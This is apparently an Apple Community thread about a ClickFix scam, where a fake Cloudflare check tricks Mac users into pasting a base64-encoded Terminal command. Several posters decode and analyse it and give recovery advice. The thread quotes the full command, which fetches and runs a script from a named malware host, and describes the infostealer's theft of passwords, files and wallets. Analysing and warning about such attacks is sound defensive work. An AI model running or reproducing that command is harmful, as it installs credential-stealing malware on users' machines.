Understanding and reversing a suspicious terminal command

That wasn’t manual verification, that was a malicious exploit.

One of the variations of this is known as ClickFix. There may be others.

As for what happened here, that depends entirely on what was downloaded, and the downloaded tooling can vary widely. And what got downloaded can then make other changes, deletions, additions, whatever.

Restore your system from backup. Change your credentials. Now.

Reading:

• https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer/

The same technique is also being used elsewhere:

• https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

Gad-2 wrote:

can i do anything to know for sure if i'm compromised or not ? also it's a fresh device with no data at all but i loggen into my accounts on it apple and google accounts, could it have access to my browser data that is saved on the cloud ?

I don't know if you could "prove" you are "ok" because whatever you look for, you might miss something.

Instead of trying to figure out what might have happened, assume the worst and make a clean start.

I think changing the Apple ID and Google (and all other) passwords is how to start. Especially if they are synchronized across multiple devices. Now is the time to act before someone else does something.

Wiping the Mac and restoring from a backup predating the "event" plus changing ALL passwords makes you quite secure, I think. By the way, ALL passwords includes banking, all logins to web sites, social media, Microsoft-365, emails, Netflix etc., everything. As all that stuff from Keychain or Passwords or caches or browser saved data could be accessed and sent out to whomever instigated this. Some passwords and credit card info is saved in these places. In fact I think that is what those nasty scripts try to do that you might have unintentionally executed in Terminal.

Also, temporarily disable Wallet on all your devices. Definitely monitor all your credit cards and debit accounts carefully going forward.

I don't think I would be able to sleep at night until I did these things if this happened to me. Don't waste time or energy rethinking or regretting what happened, just focus on what you need to do going forward.

Lesson learned might be to be very cautious about any use of Terminal. And never to insert any code externally found or generated into your Mac via scripts or Terminal commands.

Gad-2 wrote:

this i exactly what happened with me, did i get hacked? and how to make sre i'm not compromised?

https://discussions.apple.com/content/attachment/85a2c737-e073-4415-a4f7-a3c9ab89cdd2

[Edited by Moderator]

This is social engineering and it tricked you, when you clicked the "copy" button it did not copy that innocuous text but instead it loaded something else that you pasted into Terminal, of all things. You were not hacked but it appears may have been tricked into executing a script that may have copied any number of private items from your Mac or loaded who knows what.

I would change your Apple ID to start and then change all your passwords. Use two-factor for everything. As Camelot suggests, restore your computer from a backup that predates this event.

v_panos wrote:

Same issue here , got the cloud fare asking me to verify via terminal with a copy paste command.

When I pasted the command and pressed enter it asked me for my Mac password. I immediately understood that I made a mistake , so at that moment I just HARD SWITCH OFF my laptop by am not sure if it was compromised.

I believe you avoided the worst implications by never entering the password, which greatly limits what can be done, especially on a Mac. That said, Apple is constantly providing MacOS updates to plug holes in security, some of which do not require an administrator password.

One thing you can do for a little more peace of mind is run Malwarebytes which does check for malware, which I think is the primary concern here.

It would take me a few days to empty my Mac onto hard disk and make a fresh install of macOS.

I don't think that is the case, I have actually done this and it took several hours. And after doing it, the Mac ran more responsively because the "clean install/refresh" no doubt rid me of unneeded background items.

Is there a way to check if something was installed ? a way to check if it was compromised ?

You can check by going to About This Mac or Settings and select System Report, then look under Installations. It lists everything installed and when it was installed. But a nefarious program might hide itself from that list, and that list is for software, not sure if startup or system launch scripts would even show up there. You could check your startup items and launchd items. But the people engineering these things are clever and might find a way to hide it from you.

I opened the laptop again, changed the user password on Apple account.

I will need to move all my data out before reinstalling macOS, however in the meantime I am not sure if my data is safe.

Good to change the Apple password, also change your user account passwords on the Mac, router password, and I would change banking/finance site passwords also.

Since you actually pasted a bad command into terminal and pushed enter, I think I would backup all files (or better yet, use a backup done from before the event) and then do a complete reset of the Mac, following Apple's instructions for what to do before preparing a Mac for sale or exchange. Then install a new MacOS and I would feel ok about migrating files only from the backup, don't migrate any executable code and no settings. With all those password changes you made I would feel pretty secure. When I have done this in the past (I did it to restore an older laptop to a clean install status for other reasons), it only took several hours, including the time to reinstall all software (e.g. Microsoft, Adobe, other purchased software) anew. Maybe others will weigh in here, either what I suggest is overly cautious or not cautious enough.

Gad-2 wrote:

I would tend to agree with steve626 commenst above including:

"As Camelot suggests, restore your computer from a backup that predates this event. "

it seems painless enough to erase/reinstall the macOS and restore your User from a backup just to proceed with a regained sense of confidence.

the concerning part of the dubious base64 code which was not specifically comment on:

nohup bash & —command used in to run a Bash script or command in the background, ensuring it continues to execute even if the user logs out or closes the terminal

nohup – invoke a utility immune to hangups

ref: How to reinstall macOS - Apple Support

ref: Restore your Mac from a backup - Apple Support

The link it's pointing to throws up all kinds of red flags on my system - the site itself (plainfenassociates.com) is marked as compromised, and likely being used as a malware distribution node.

The fact they try to obfuscate the hostname via base64 encoding the URL is another red flag.

So, definitely a concern. How much depends on how far down their rabbit hole you fell. Viewing the site should be innocuous, but if you downloaded and installed anything from there, time to wipe your machine and revert to a backup.

Gad-2 wrote:

this i exactly what happened with me, did i get hacked?

It was almost certainly an attempt to do so. Unfortunately, this is how social engineering works.

It's why, for example, after decoding the string of text you posted I did not post the full link but rather just the top level domain. Looking at the website (Ascent Gate), I would judge it to be fake. No details beyond the one page, the address is to a non-existent location (no building there, much less a commercial one), the phone number is a dead end, etc.

I suspect that because of the speed bump put into macOS that required your permission for disk access and which you denied, that the attempt was thwarted. However, that's my personal thinking – this is outside my area of knowledge (though I will say I would never enter anything in Terminal prompted by a browser popup).

Gad-2 wrote:

I'm not sure what that is but i'm suspecious so how do i undo or reverse or just know what that was about?

It's a cryptocurrency stealer malware for Chrome.

It might do other things too. Inside the obfuscated download are still more obfuscated Chrome extensions. But much of the crypto-stealer logic is in plain text, so that's easy to see. It also installs something called "salmonela", which can't be good I'm sure.

Edit: It's looking at Safari and various Firefox flavours too.

Gad-2 wrote:

i was opening a site and it wanted manual verfication for cloudflare through terminal so i copied the command and pasted it, it was " echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnBsYWluZmVuYXNzb2NpYXRlcy5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash "

I'm not sure what that is but i'm suspecious so how do i undo or reverse or just know what that was about?

tank you

[Re-Titled by Moderator]

Original Title: terminal command

You do not paint a very big picture— what and why were you prompted to run the terminal...?

curl - transfer a URL

-s flag --silent or quiet mode. Do not show progress meter or error messages. Makes Curl mute.

The base64 translates:

curl -s https://gamma.plainfenassociates.com/strix/index.php | nohup bash &

TLD https://plainfenassociates.com/

Gad-2 wrote:

also after that terminal asked for disk permissions but i declined, don't know if that'll help.

Sounds like you may have dodged a bullet...

The whole thing seems naive Internet behavior; might be worth reviewing some of the fundamentals, including not copying & pasting unknown random Terminal commands from some dubious website.

Recognize and avoid phishing messages...

Recognize and avoid social engineering schemes including phishing messages, phony support calls, and other scams - Apple Support

Protecting against malware in macOS

Protecting against malware in macOS - Apple Support

Effective defenses against malware and other threats… - Apple Community

Effective defenses against malware and ot… - Apple Community

Security and your Apple Account Security and your Apple Account - Apple Support

I got a similar thing and out of curiosity, I ran it on my older mac which was restored to factory settings. It downloads a script from

curl -s | nohup bash &

It asked for a password which I did not provide and on running ps, I found a command running on my machine. It is a script to be executed from osascript. I have attached the contents of the script for anyone who is interested as additional text as it went over the 5000 char limit

[Edited by Moderator]

On first glance, that appears to be a malicious script to send your password, and the contents of a bunch of files that might be "of interest", to the scammer.

I didn't take the time to thoroughly understand the code, and I certainly didn't run it on my own machine …

yea, it actually does a lot. In some digging through

1. reads password
2. adds a bunch of cookies to chromium based browsers
3. grabs pdf, docs, wallets etc
4. tries to get cryptowallets

I am not too proficient in osascripts but do understand the syntax a bit. It appears to be a smart plug. For reference, this happened to me with DuckDuckGo as my browser and clicking on the first link of the search "GPU Benchmarks for ML". Oddly enough, when I clicked the link today, this did not happen.

[Edited by Moderator]

ashsriv wrote:

1. yea, it actually does a lot. In some digging through

reads password

2. adds a bunch of cookies to chromium based browsers

3. grabs pdf, docs, wallets etc

4. tries to get cryptowallets

I would also add the caution that the scammer site might have been set up to return different malicious scripts at different times.

We cannot rule out the possibility that other people might have gotten scripts with even more nasty stuff in them.

Camelot wrote:

> When I pasted the command and pressed enter it asked me for my Mac password. I immediately understood that I made a mistake , so at that moment I just HARD SWITCH OFF my laptop by am not sure if it was compromised.

Not much could happen if you didn't enter your password. That's the last defense against anything malicious. Everything up to that point (copying the script, downloading files to your machine, etc.) is moot and irrelevant until you enter that password and then you've let them in and lost all control.

Many core macOS files might be protected – but a malicious script would not need to get the user's password in order to ransack, copy, and/or vandalize the user's data.

Including, perhaps, files containing information that would be useful for committing identity / financial fraud.